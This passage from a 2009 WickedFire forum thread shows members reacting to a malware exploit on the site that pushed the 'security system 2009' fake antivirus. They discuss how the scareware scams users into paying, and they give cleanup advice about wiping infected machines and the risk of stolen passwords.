xmcp123 is offline  
Old 06-12-2009, 05:14 PM   #40 (permalink)
 
Join Date: Jun 2006
Location: San Diego
Posts: 3,418
iTrader: 3 / 100%
Stanley Stanley Stanley Stanley Stanley Stanley Stanley Stanley Stanley Stanley Stanley
We removed all traces of the exploit but if it resurfaces send a PM to me & Brandon.
Stanley is offline  
Old 06-13-2009, 12:38 AM   #41 (permalink)
Senior Member
 
bprimeelite's Avatar
 
Join Date: May 2009
Posts: 776
iTrader: 2 / 100%
bprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond reputebprimeelite has a reputation beyond repute
ahhh I was hoping this was a digital point type of move where they put 20 iframes per page with amazon, ebay, and other affiliate cookies. I never did get a warning using firefox and AVG on this one though and AVG is usually pretty touchy on iframes.
bprimeelite is offline  
Old 06-13-2009, 12:54 AM   #42 (permalink)
Hustle hard
 
amanda11's Avatar
 
Join Date: Nov 2007
Posts: 2,441
iTrader: 0 / 0%
amanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond reputeamanda11 has a reputation beyond repute
OH NOES MALWARE STOLE MAH PASSWORDS.

Seriously, what did the asshole did to my computer.
amanda11 is offline  
Old 06-14-2009, 06:07 AM   #43 (permalink)
Senior Member
 
Join Date: May 2008
Location: NSW, Australia
Posts: 466
iTrader: 21 / 96%
CPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond reputeCPW-Carl has a reputation beyond repute
It was called "security system 2009". Basically it tries to scare you into inputing your credit card details to get rid of spyware it "finds" on your system. Oh the irony.
CPW-Carl is offline  
Old 06-14-2009, 06:31 AM   #44 (permalink)
Banned
 
Join Date: Mar 2008
Posts: 37
iTrader: 0 / 0%
btalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond reputebtalibanned has a reputation beyond repute
Hey hey hey, wtf is going on here? Where's jon? Where's the Official word on whats happenin? Who's responsible for this shit?

It's not me...
btalibanned is offline  
Old 06-14-2009, 09:55 AM   #45 (permalink)
Senior Member
 
Join Date: Apr 2009
Posts: 158
iTrader: 0 / 0%
dably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond reputedably has a reputation beyond repute
Quote:
Originally Posted by amanda11 View Post
OH NOES MALWARE STOLE MAH PASSWORDS.

Seriously, what did the asshole did to my computer.
I'm to lazy to check out the payload but from the sounds of it, security system 2009, is a yet another fake AV. I really want to know how these folks get and keep merchant accounts. The chargeback rate on that stuff has to be insanely high.

Seriously if you got infected with it consider wiping your hard drive there is no telling what they bundled that crap with. Undetected password stealers are a dime a dozen and if you manage your servers from the same computer there is a fair chance you will have your passwords stolen for them and similar malicious code placed on your sites.
dably is offline  
Old 06-14-2009, 12:08 PM   #46 (permalink)
Senior Member
 
Spades's Avatar
 
Join Date: Mar 2007
Location: Florida
Posts: 616
iTrader: 0 / 0%
Spades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond reputeSpades has a reputation beyond repute
Quote:
Originally Posted by dably View Post
I'm to lazy to check out the payload but from the sounds of it, security system 2009, is a yet another fake AV. I really want to know how these folks get and keep merchant accounts. The chargeback rate on that stuff has to be insanely high.

Seriously if you got infected with it consider wiping your hard drive there is no telling what they bundled that crap with. Undetected password stealers are a dime a dozen and if you manage your servers from the same computer there is a fair chance you will have your passwords stolen for them and similar malicious code placed on your sites.
I dunno so much about the high chargebacks, you gotta think, peoples systems are completely fucked by the malware and then boom... they pay for the software and it does exactly what it has promised them. Nevertheless, it's a shady ass way of making money. But I doubt it's that hard to maintain a merchants account and i'm sure they bundle their transactions with other (actually legit) products.
__________________

Spades is offline  
Old 06-14-2009, 12:30 PM   #47 (permalink)
 
xmcp123's Avatar
 
Join Date: Sep 2007
Location: Not Louisiana
Posts: 3,915
iTrader: 3 / 100%
xmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond reputexmcp123 has a reputation beyond repute
Quote:
Originally Posted by btalibanned View Post
Hey hey hey, wtf is going on here? Where's jon? Where's the Official word on whats happenin? Who's responsible for this shit?

It's not me...
Not sure where Jon is. But I'm tellin ya anything tryin to track them back via their domain is a failboat.
No way to tell who's a real person in Russia.
No way to tell if the non-russian names are real. Or stolen.
There's a lot more nastiness coming from these guys. It's a minefield trying to find them. And also, there's certain people you just don't out.
__________________
xmcp123 is offline  
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Where WickedFire took you or can take you !? NYDAz Shooting The Shit 19 09-26-2008 01:24 AM
New WickedFire Report Jon Shooting The Shit 38 11-21-2007 06:04 AM
matt Cutts: how google handles malware..very informative Armpitpatal Affiliate Marketing 4 05-21-2007 04:56 PM


All times are GMT -4. The time now is 12:19 PM.


WickedFire.com Copyright © 2011 - WickedFire is an international registered Trademark of Coastal Synergy LLC. You may not use any of our trademarks, copyrights, content, or images without a written approval by members of Coastal Synergy LLC.

Search Engine Optimization by vBSEO 3.6.0